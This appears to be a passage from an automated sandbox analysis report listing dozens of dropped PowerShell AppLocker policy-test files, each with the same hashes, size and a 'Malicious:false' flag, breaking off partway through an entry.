                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xny5hdv.suy.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31duozca.a5x.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32diwoqo.zw0.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41hzin4b.qnl.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gidlnea.ioj.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qg3ylqg.thb.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52ry0z4r.krq.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lvba4oa.lzy.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcp1dl5w.ic2.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brubbskd.pmu.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bts5qy3n.dum.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq2y13qs.05z.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_filg3bsn.kem.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxvreusi.1sl.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvskkmcc.jaj.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpmlhrna.tyu.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i02hwxoy.f3q.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkkpn3xr.jvc.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kiblwhx0.4lb.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le3d3htk.z3y.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbnsteeo.d1v.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmogvf2g.cnm.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc0uracz.ybw.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwzt31qj.w0n.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obwtrypu.yot.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olgk2ovd.h1z.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
